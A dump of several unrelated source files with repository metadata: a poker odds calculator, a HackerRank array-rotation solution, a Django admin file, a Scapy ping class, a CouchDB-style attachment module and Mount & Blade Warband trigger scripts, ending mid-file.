result_histograms.append([0] * len(holdem_functions.hand_rankings))
# Choose whether we're running a Monte Carlo or exhaustive simulation
board_length = 0 if given_board is None else len(given_board)
# When a board is given, exact calculation is much faster than Monte Carlo
# simulation, so default to exact if a board is given
if exact or given_board is not None:
generate_boards = holdem_functions.generate_exhaustive_boards
else:
generate_boards = holdem_functions.generate_random_boards
if (None, None) in hole_cards:
hole_cards_list = list(hole_cards)
unknown_index = hole_cards.index((None, None))
for filler_hole_cards in holdem_functions.generate_hole_cards(deck):
hole_cards_list[unknown_index] = filler_hole_cards
deck_list = list(deck)
deck_list.remove(filler_hole_cards[0])
deck_list.remove(filler_hole_cards[1])
holdem_functions.find_winner(generate_boards, tuple(deck_list),
tuple(hole_cards_list), num,
board_length, given_board, winner_list,
result_histograms)
else:
holdem_functions.find_winner(generate_boards, deck, hole_cards, num,
board_length, given_board, winner_list,
result_histograms)
if verbose:
holdem_functions.print_results(hole_cards, winner_list,
result_histograms)
return holdem_functions.find_winning_percentage(winner_list)
if __name__ == '__main__':
start = time.time()
main()
print "\nTime elapsed(seconds): ", time.time() - start
| [
"kevin.tseng@gmail.com"
] | kevin.tseng@gmail.com |
0564ea410472f263a69ec01666ed0456ace1bef1 | 542d8c7b2c8e8f08cad1e0fa44420aa063e3eece | /Array_Rotation.py | ad23e6f9f149ffd66311c3b564de1a292c4fa642 | [] | no_license | bharatigupta2405/Python_Hacker_Rank | 28b63fff5c565df69dc87d2332864ff7f52cd4f3 | 0c336dc2e6a4de2e71181479f3d9523250b399da | refs/heads/master | 2023-01-14T07:55:20.357746 | 2020-10-26T12:28:32 | 2020-10-26T12:28:32 | 290,551,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the circularArrayRotation function below.
def circularArrayRotation(a, k, queries):
for i in range(k):
p=a.pop()
a.insert(0,p)
l=[]
for j in range(len(queries)):
l.append(a[queries[j]])
return l
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nkq = input().split()
n = int(nkq[0])
k = int(nkq[1])
q = int(nkq[2])
a = list(map(int, input().rstrip().split()))
queries = []
for _ in range(q):
queries_item = int(input())
queries.append(queries_item)
result = circularArrayRotation(a, k, queries)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| [
"bharatigupta2405@gmail.com"
] | bharatigupta2405@gmail.com |
995e7d7fa2a00ac9c6f5dbea6b5dcb634a78969e | 74684bedb970ed2513df94610d2bc112e4c2fc2f | /venv/bin/sqlformat | 79b5cf7dad5c5b99d29b2e2355a475fbc1cbcf6a | [] | no_license | yuwenjian/appdownload | 5d540d56799408769474f516f089a25a231ca85f | 2fd6fd1a5483fc3bd7908a25bc237d4df53dcdb6 | refs/heads/master | 2023-04-30T17:43:17.014096 | 2021-05-20T14:37:01 | 2021-05-20T14:37:01 | 369,238,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | #!/Users/yuwenjian/PycharmProjects/appdownload/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"740225978@qq.com"
] | 740225978@qq.com | |
0c5dad277b1f94b096cb126e84f0d1017a3d54d2 | a9bc7252381890cb95a4d56215ae9094e355c793 | /products/admin.py | 2efd3c24f71c899d3225e4c10151d45604e12fec | [] | no_license | behnazkhoshnood/tadig_restaurant_v2 | 35e2f89206824dda61ddc58bf7ae6b81ea7b741f | 0abb0e1c6e96ea57d6924a4eacbed883745804c4 | refs/heads/master | 2023-06-26T00:31:49.495375 | 2021-08-02T10:36:16 | 2021-08-02T10:36:16 | 361,359,556 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | from django.contrib import admin
from .models import Product, Category, Review
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
list_display = (
'sku',
'name',
'category',
'price',
'image',
)
ordering = ('sku',)
class CategoryAdmin(admin.ModelAdmin):
list_display = (
'friendly_name',
'name',
)
class ReviewAdmin(admin.ModelAdmin):
list_display = (
'product',
'user',
'comment',
'rating',
)
readonly_fields = (
'product',
'user',
'comment',
'rating',
)
admin.site.register(Product, ProductAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Review)
| [
"behnaz.khoshnood@gmail.com"
] | behnaz.khoshnood@gmail.com |
6d73d131e26cfb65c423acd5a641958d3283c4e9 | 8704a683e1fa8c7c15d114fca47345eef060326b | /类/Pingclass.py | 37f162cbbd1550ec1a90053f63e4624826cfe8ab | [] | no_license | jiaojiner/Python_Basic | 823be07e8c02585174d933bc3e4ecf528086162c | 788243f95746e2a00890ebb3262085598ab84800 | refs/heads/master | 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python3
# -*- encoding = utf-8 -*-
# 该代码由本人学习时编写,仅供自娱自乐!
# 本人QQ:1945962391
# 欢迎留言讨论,共同学习进步!
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
def __init__(self, srcip, dstip, qua=1):
self.srcip = srcip
self.ip = dstip
self.qua = qua
self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
# def src(self, srcip):
# self.srcip = srcip
# self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
def ping(self):
for x in range(self.qua):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print(self.ip, '可达!')
else:
print(self.ip, '不可达!')
| [
"15148365776@163.com"
] | 15148365776@163.com |
970b585846494138f5ad4e230612d400e3710200 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | 44594aaf70c93ad1b1494c16df3e8a52cb7efb6d | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 178 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
27828211be311596d2c18ff3abb1ad40fcdeeb1b | 41874a979a1e34fde24c868a622c985192e6b082 | /chairdb/dbs/attachments.py | b567e5e8790868504df891b1abc30ffeb5f9a1a4 | [
"Apache-2.0"
] | permissive | KouchDB/chairdb | 85f978ecee5ddf9fe1005982d0f41e66c71dc166 | 5cd64c7b58eef960a434da672e72c9b73e576283 | refs/heads/master | 2023-04-26T01:07:35.421151 | 2021-05-29T19:05:26 | 2021-05-29T19:05:26 | 562,342,461 | 1 | 0 | Apache-2.0 | 2022-11-06T03:05:41 | 2022-11-06T03:05:40 | null | UTF-8 | Python | false | false | 2,953 | py | import bisect
import typing
from ..errors import PreconditionFailed
from ..datatypes import AttachmentMetadata, AttachmentStub
class AttachmentRecord(typing.NamedTuple):
meta: AttachmentMetadata
data_ptr: typing.Any
def read_atts(att_store_raw, branch, selector):
att_store = decode_att_store(att_store_raw)
names, since_revs = selector
result = {}
todo = []
for name, att_record in att_store.items():
rec_rev_num = att_record.meta.rev_pos
changed = record_change_since(rec_rev_num, since_revs, branch)
if name in names or changed:
todo.append((name, att_record))
else:
result[name] = AttachmentStub(att_record.meta)
return result, todo
def decode_att_store(store):
return {
name: AttachmentRecord(AttachmentMetadata(*meta), ptr)
for name, (meta, ptr) in store.items()
}
def record_change_since(record_rev_num, revs, branch):
return not (revs is None or any(
record_rev_num <= rev_num and branch.contains(rev_num, rev_hash)
for rev_num, rev_hash in revs
))
def update_atts(store_raw, new_attachments, chunk_info):
store = decode_att_store(store_raw)
new_store = {}
for name, new_att in new_attachments.items():
if new_att.is_stub:
new_store[name] = reuse_record(store, name, new_att)
else:
new_store[name] = AttachmentRecord(new_att.meta, chunk_info[name])
return new_store
def reuse_record(store, name, new_att):
try:
old_att = store[name]
except KeyError:
raise PreconditionFailed('stub without attachment')
if new_att.meta.rev_pos != old_att.meta.rev_pos:
raise PreconditionFailed('stub with wrong rev_pos')
# re-use the existing one, but allow changing e.g. the
# content-type. CouchDB does too...
return AttachmentRecord(new_att.meta, old_att.data_ptr)
def chunk_id(att_id, i):
return f'_chunk_{att_id}_{i:020}'
def slice_att(data_ptr, slice):
assert slice.step is None
att_id, chunk_ends = data_ptr
start_chunk_i, start_offset = find_start(slice.start, chunk_ends)
end_chunk_i, end_offset = find_end(slice.stop, chunk_ends)
start_key = chunk_id(att_id, start_chunk_i)
end_key = chunk_id(att_id, end_chunk_i)
last_i = end_chunk_i - start_chunk_i
return start_key, end_key, start_offset, end_offset, last_i
def find_start(start, chunk_ends):
if start is None:
return 0, None
start_chunk_i = bisect.bisect_right(chunk_ends, start)
return start_chunk_i, start - chunk_start(chunk_ends, start_chunk_i)
def find_end(stop, chunk_ends):
if stop is None:
return len(chunk_ends) - 1, None
end_chunk_i = bisect.bisect_left(chunk_ends, stop)
return end_chunk_i, stop - chunk_start(chunk_ends, end_chunk_i)
def chunk_start(chunk_ends, chunk_i):
if chunk_i == 0:
return 0
return chunk_ends[chunk_i - 1]
| [
"m@rtendevri.es"
] | m@rtendevri.es |
8cd9a1e1e32f967d1d4ab387ae290f7e282e8669 | ab224876fc8da911f3a43554701c2d8392191039 | /source/module_triggers.py | 5fc446775e0cda62d8b8641ac459a53840a99e7e | [] | no_license | LilyModzStuff/warband_mod_source | ab5170f7ee3dd5a1af3541e50891029bcd5701be | c9737d7793ccdb185d8d3caedda0da915104e405 | refs/heads/master | 2022-10-04T21:01:08.032485 | 2019-04-05T06:59:44 | 2019-04-05T06:59:44 | 144,548,421 | 18 | 17 | null | 2022-09-08T08:31:38 | 2018-08-13T08:06:59 | Python | UTF-8 | Python | false | false | 86,926 | py | from header_common import *
from header_operations import *
from header_parties import *
from header_items import *
from header_skills import *
from header_triggers import *
from header_troops import *
from module_constants import *
from compiler import *
####################################################################################################################
# Each trigger contains the following fields:
# 1) Check interval: How frequently this trigger will be checked
# 2) Delay interval: Time to wait before applying the consequences of the trigger
# After its conditions have been evaluated as true.
# 3) Re-arm interval. How much time must pass after applying the consequences of the trigger for the trigger to become active again.
# You can put the constant ti_once here to make sure that the trigger never becomes active again after it fires once.
# 4) Conditions block (list). This must be a valid operation block. See header_operations.py for reference.
# Every time the trigger is checked, the conditions block will be executed.
# If the conditions block returns true, the consequences block will be executed.
# If the conditions block is empty, it is assumed that it always evaluates to true.
# 5) Consequences block (list). This must be a valid operation block. See header_operations.py for reference.
####################################################################################################################
# Some constants for use below
merchant_inventory_space = 30
num_merchandise_goods = 36
triggers = [
# Tutorial:
(0.1, 0, ti_once, [(map_free,0)], [(dialog_box,"str_tutorial_map1")]),
# Refresh Merchants
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_inventories"),
]),
# Refresh Armor sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_armories"),
]),
# Refresh Weapon sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_weaponsmiths"),
]),
# Refresh Horse sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_stables"),
]),
#############
#Captivity:
# (1.0, 0, 0.0, [],
# [
# (ge,"$captivity_mode",1),
# (store_current_hours,reg(1)),
# (val_sub,reg(1),"$captivity_end_time"),
# (ge,reg(1),0),
# (display_message,"str_nobleman_reached_destination"),
# (jump_to_menu,"$captivity_end_menu"),
# ]),
(5.7, 0, 0.0,
[
(store_num_parties_of_template, reg2, "pt_manhunters"),
(lt, reg2, 4)
],
[
(set_spawn_radius, 1),
# (store_add, ":p_town_22_plus_one", "p_town_22", 1), #SB : obvious random range
(store_random_in_range, ":selected_town", towns_begin, towns_end),
(spawn_around_party, ":selected_town", "pt_manhunters"),
]),
(1.0, 0.0, 0.0, [
(check_quest_active, "qst_track_down_bandits"),
(neg|check_quest_failed, "qst_track_down_bandits"),
(neg|check_quest_succeeded, "qst_track_down_bandits"),
],
[
(quest_get_slot, ":bandit_party", "qst_track_down_bandits", slot_quest_target_party),
(try_begin),
(party_is_active, ":bandit_party"),
(store_faction_of_party, ":bandit_party_faction", ":bandit_party"),
(neg|is_between, ":bandit_party_faction", kingdoms_begin, kingdoms_end), #ie, the party has not respawned as a non-bandit
(assign, ":spot_range", 8),
(try_begin),
(is_currently_night),
(assign, ":spot_range", 5),
(try_end),
(try_for_parties, ":party"),
(gt, ":party", "p_spawn_points_end"),
(store_faction_of_party, ":faction", ":party"),
(is_between, ":faction", kingdoms_begin, kingdoms_end),
(store_distance_to_party_from_party, ":distance", ":party", ":bandit_party"),
(lt, ":distance", ":spot_range"),
(try_begin),
(eq, "$cheat_mode", 1),
(str_store_party_name, s4, ":party"),
(display_message, "@{!}DEBUG -- Wanted bandits spotted by {s4}"),
(try_end),
(call_script, "script_get_closest_center", ":bandit_party"),
(assign, ":nearest_center", reg0),
# (try_begin),
# (get_party_ai_current_behavior, ":behavior", ":party"),
# (eq, ":behavior", ai_bhvr_attack_party),
# (call_script, "script_add_log_entry", logent_party_chases_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (else_try),
# (eq, ":behavior", ai_bhvr_avoid_party),
# (call_script, "script_add_log_entry", logent_party_runs_from_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (else_try),
(call_script, "script_add_log_entry", logent_party_spots_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (try_end),
(try_end),
(else_try), #Party not found
(display_message, "str_bandits_eliminated_by_another"),
(call_script, "script_abort_quest", "qst_track_down_bandits", 0),
(try_end),
]),
#Tax Collectors
# Prisoner Trains
# (4.1, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_prisoner_train"),
# (assign, "$pin_limit", peak_prisoner_trains),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
#
# (4.1, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_prisoner_train"),
# (assign, "$pin_limit", peak_prisoner_trains),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
(2.0, 0, 0, [(store_random_party_of_template, reg(2), "pt_prisoner_train_party"),
(party_is_in_any_town,reg(2)),
],
[(store_faction_of_party, ":faction_no", reg(2)),
(call_script,"script_cf_select_random_walled_center_with_faction", ":faction_no", -1),
(party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
(party_set_ai_object,reg(2),reg0),
(party_set_flags, reg(2), pf_default_behavior, 0),
]),
##Caravans
# (4.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_caravan"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
# (4.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_caravan"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
## (2.0, 0, 0, [(store_random_party_of_template, reg(2), "pt_kingdom_caravan_party"),
## (party_is_in_any_town,reg(2)),
## ],
## [(store_faction_of_party, ":faction_no", reg(2)),
## (call_script,"script_cf_select_random_town_with_faction", ":faction_no"),
## (party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
## (party_set_ai_object,reg(2),reg0),
## (party_set_flags, reg(2), pf_default_behavior, 0),
## ]),
(4.0, 0, 0.0,
[
(eq, "$caravan_escort_state", 1), #cancel caravan_escort_state if caravan leaves the destination
(assign, ":continue", 0),
(try_begin),
(neg|party_is_active, "$caravan_escort_party_id"),
(assign, ":continue", 1),
(else_try),
(get_party_ai_object, ":ai_object", "$caravan_escort_party_id"),
(neq, ":ai_object", "$caravan_escort_destination_town"),
(assign, ":continue", 1),
(try_end),
(eq, ":continue", 1),
],
[
(assign, "$caravan_escort_state", 0),
]),
#Messengers
# (4.2, 0, 0.0, [],
# [(assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_messenger"),
# (assign, "$pin_limit", peak_kingdom_messengers),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
# (4.2, 0, 0.0, [],
# [(assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_messenger"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
#SB : messengers are deleted upon reaching destination, this should never apply
(1.5, 0, 0, [
# (store_random_party_of_template, reg(2), "pt_messenger_party"),
# (party_is_in_any_town,reg(2)),
],
[
# (store_faction_of_party, ":faction_no", reg(2)),
# (call_script,"script_cf_select_random_walled_center_with_faction", ":faction_no", -1),
# (party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
# (party_set_ai_object,reg(2),reg0),
# (party_set_flags, reg(2), pf_default_behavior, 0),
]),
#Deserters
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_deserters"),
# (assign, "$pin_limit", 4),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_deserters"),
# (assign, "$pin_limit", 4),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Kingdom Parties
(1.0, 0, 0.0, [],
[(try_for_range, ":cur_kingdom", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":cur_kingdom", slot_faction_state, sfs_active),
## (neq, ":cur_kingdom", "fac_player_supporters_faction"),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_forager),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_scout),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_patrol),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_messenger),
## (try_end),
(try_begin),
(store_random_in_range, ":random_no", 0, 100),
(lt, ":random_no", 10),
(call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_kingdom_caravan),
(try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_prisoner_train),
## (try_end),
(try_end),
]),
#Swadians
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_foragers",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_scouts",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_harassers",3)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_war_parties",2)]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_foragers"),
# (assign, "$pin_limit", "$peak_swadian_foragers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_scouts"),
# (assign, "$pin_limit", "$peak_swadian_scouts"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_patrol"),
# (assign, "$pin_limit", "$peak_swadian_harassers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_war_party"),
# (assign, "$pin_limit", "$peak_swadian_war_parties"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Vaegirs
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_foragers",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_scouts",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_harassers",3)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_war_parties",2)]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_foragers"),
# (assign, "$pin_limit", "$peak_vaegir_foragers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_scouts"),
# (assign, "$pin_limit", "$peak_vaegir_scouts"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_patrol"),
# (assign, "$pin_limit", "$peak_vaegir_harassers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_war_party"),
# (assign, "$pin_limit", "$peak_vaegir_war_parties"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Villains etc.
# (14.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_sea_raiders"),
# (assign, "$pin_party_template", "pt_sea_raiders"),
# (assign, "$pin_limit", 5),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_refugees"),
## (assign, "$pin_limit", 5),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
##
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_farmers"),
## (assign, "$pin_limit", 6),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
# [1.0, 96.0, ti_once, [], [[assign,"$peak_dark_hunters",3]]],
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_dark_hunters"),
## (assign, "$pin_limit", "$peak_dark_hunters"),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
#Companion quests
## (0, 0, ti_once,
## [
## (entering_town,"p_town_1"),
## (main_party_has_troop,"trp_borcha"),
## (eq,"$borcha_freed",0)
## ],
##
## [
## (assign,"$borcha_arrive_sargoth_as_prisoner", 1),
## (start_map_conversation, "trp_borcha", -1)
## ]
## ),
##
## (1, 0, ti_once,
## [
## (map_free,0),
## (eq,"$borcha_asked_for_freedom",0),
## (main_party_has_troop,"trp_borcha")
## ],
## [
## (start_map_conversation, "trp_borcha", -1)
## ]
## ),
##
## (2, 0, ti_once,
## [
## (map_free, 0),
## (neq,"$borcha_asked_for_freedom",0),
## (eq,"$borcha_freed",0),
## (main_party_has_troop,"trp_borcha")
## ],
## [
## (start_map_conversation, "trp_borcha", -1),
## ]
## ),
##### TODO: QUESTS COMMENT OUT BEGIN
###########################################################################
### Random Governor Quest triggers
###########################################################################
# Incriminate Loyal Advisor quest
(0.2, 0.0, 0.0,
[
(check_quest_active, "qst_incriminate_loyal_commander"),
(neg|check_quest_concluded, "qst_incriminate_loyal_commander"),
(quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_current_state, 2),
(quest_get_slot, ":quest_target_center", "qst_incriminate_loyal_commander", slot_quest_target_center),
(quest_get_slot, ":quest_target_party", "qst_incriminate_loyal_commander", slot_quest_target_party),
(try_begin),
(neg|party_is_active, ":quest_target_party"),
(quest_set_slot, "qst_incriminate_loyal_commander", slot_quest_current_state, 3),
(call_script, "script_fail_quest", "qst_incriminate_loyal_commander"),
(else_try),
(party_is_in_town, ":quest_target_party", ":quest_target_center"),
(remove_party, ":quest_target_party"),
(quest_set_slot, "qst_incriminate_loyal_commander", slot_quest_current_state, 3),
(quest_get_slot, ":quest_object_troop", "qst_incriminate_loyal_commander", slot_quest_object_troop),
(assign, ":num_available_factions", 0),
(try_for_range, ":faction_no", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":faction_no", slot_faction_state, sfs_active),
(neq, ":faction_no", "fac_player_supporters_faction"),
(neg|quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_target_faction, ":faction_no"),
(val_add, ":num_available_factions", 1),
(try_end),
(try_begin),
(gt, ":num_available_factions", 0),
(store_random_in_range, ":random_faction", 0, ":num_available_factions"),
(assign, ":target_faction", -1),
(try_for_range, ":faction_no", kingdoms_begin, kingdoms_end),
(eq, ":target_faction", -1),
(faction_slot_eq, ":faction_no", slot_faction_state, sfs_active),
(neq, ":faction_no", "fac_player_supporters_faction"),
(neg|quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_target_faction, ":faction_no"),
(val_sub, ":random_faction", 1),
(lt, ":random_faction", 0),
(assign, ":target_faction", ":faction_no"),
(try_end),
(try_end),
(try_begin),
(gt, ":target_faction", 0),
(call_script, "script_change_troop_faction", ":quest_object_troop", ":target_faction"),
(else_try),
(call_script, "script_change_troop_faction", ":quest_object_troop", "fac_robber_knights"),
(try_end),
(call_script, "script_succeed_quest", "qst_incriminate_loyal_commander"),
(try_end),
],
[]
),
# Runaway Peasants quest
(0.2, 0.0, 0.0,
[
(check_quest_active, "qst_bring_back_runaway_serfs"),
(neg|check_quest_concluded, "qst_bring_back_runaway_serfs"),
(quest_get_slot, ":quest_object_center", "qst_bring_back_runaway_serfs", slot_quest_object_center),
(quest_get_slot, ":quest_target_center", "qst_bring_back_runaway_serfs", slot_quest_target_center),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_1"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_1", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_1"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_1", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_1"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_1"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_1", ":quest_target_center"),
(try_end),
(try_end),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_2"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_2", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_2"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_2", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_2"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_2"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_2", ":quest_target_center"),
(try_end),
(try_end),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_3"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_3", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_3"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_3", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_3"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
